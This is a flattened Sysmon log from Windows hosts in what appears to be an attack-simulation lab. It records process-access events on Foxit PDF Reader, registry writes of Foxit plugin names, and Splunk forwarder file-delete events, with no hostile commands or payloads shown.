Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8aac0|C:\Windows\System32\TwinUI.dll+12ce81|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.316{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.217{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.217{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.217{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.216{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.216{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.216{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039402Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.187{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039401Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:39.062{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=913C6FCFD77FC58D71A01CF381B8BAF0,SHA256=D514E71D605AAE420F39D67EC1506B770E052105C653DCB12CEBE9235C24040A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000039400Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginInkSign\FriendlyNameInk Sign 13241300x800000000000000039399Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFoxitSmartRedact\FriendlyNameFoxitSmartRedact 13241300x800000000000000039398Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginPageformat\FriendlyNamePageFormat 13241300x800000000000000039397Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginPDFOptimizer\FriendlyNamePDFOptimizer 13241300x800000000000000039396Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginPortfolio\FriendlyNamePortfolio 13241300x800000000000000039395Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginDocProcess\FriendlyNameDocProcess 13241300x800000000000000039394Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginPageOrganizer\FriendlyNamePageOrganizer 13241300x800000000000000039393Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFoxitSign\FriendlyNameFoxit Sign 13241300x800000000000000039392Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFXExport\FriendlyNameFXExport 13241300x800000000000000039391Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginCReview\FriendlyNamecReview 13241300x800000000000000039390Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginCrossReferenceLinks\FriendlyNameCrossReferenceLinks 13241300x800000000000000039389Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginSignature\FriendlyNameSignature 13241300x800000000000000039388Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginOCRRecognition\FriendlyNameOCRRecognition 13241300x800000000000000039387Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginRuler\FriendlyNameRuler 13241300x800000000000000039386Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginLayerPanelTool\FriendlyNameLayerPanelTool 13241300x800000000000000039385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginNamedPosition\FriendlyNameNamedPosition 13241300x800000000000000039384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginEmail\FriendlyNameEmail 13241300x800000000000000039383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginSecurity\FriendlyNameSecurity 13241300x800000000000000039382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginLoupeTool\FriendlyNameLoupeTool 13241300x800000000000000039381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\MarkanyDRM\FriendlyNameMarkanyDRM 13241300x800000000000000039380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.932{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FasooDRM\FriendlyNameFasooDRM 13241300x800000000000000039379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.931{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginU3DBrowser\FriendlyNameU3DBrowser 13241300x800000000000000039378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginAIPLabel\FriendlyNameAIPLabel Integration 13241300x800000000000000039377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFXTranslator\FriendlyNameFoxitInnerPluginFXTranslator 13241300x800000000000000039376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginFoxitTool\FriendlyNameFoxitInnerPluginFoxitTool 13241300x800000000000000039375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.localContext,DeviceConntectedOrUpdatedSetValue2023-01-18 12:16:38.923{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeHKU\S-1-5-21-3390194966-3619762420-607771929-500\SOFTWARE\Foxit Software\Foxit PDF Reader 12.0\plugins\Installed\FoxitInnerPluginMenuBall\FriendlyNameMenuBall 23542300x800000000000000039442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:40.926{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED1DEF2661F8985D774AA6412B4070EB,SHA256=C4C403BD3CF09189471017AACB16FA8F9056B14C381FD731A52B3B96A6E5CC5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015028Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:40.169{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2416FB7436589C2F247567DD56B932A,SHA256=8F5B7ADDDF84607961E00F03BD1C0E3701D7737DD532204FC7544911F93118F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000039441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:40.150{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000039440Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:40.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000039439Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:40.149{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000039486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1939d9(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e235b(wow64)|C:\Windows\System32\ieframe.dll+e214a(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64) 10341000x800000000000000039485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:41.976{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19395a(wow64)|C:\Windows\System32\SHELL32.dll+1934ec(wow64)|C:\Windows\System32\ieframe.dll+e235b(wow64)|C:\Windows\System32\ieframe.dll+e214a(wow64)|C:\Windows\System32\ieframe.dll+e1b90(wow64)|C:\Windows\System32\ieframe.dll+e1956(wow64)|C:\Windows\System32\ieframe.dll+168ffa(wow64)|C:\Windows\System32\ieframe.dll+168dc6(wow64)|C:\Windows\System32\ieframe.dll+167e2a(wow64)|C:\Windows\System32\ieframe.dll+19ffd6(wow64)|C:\Windows\System32\ieframe.dll+19fe1c(wow64) 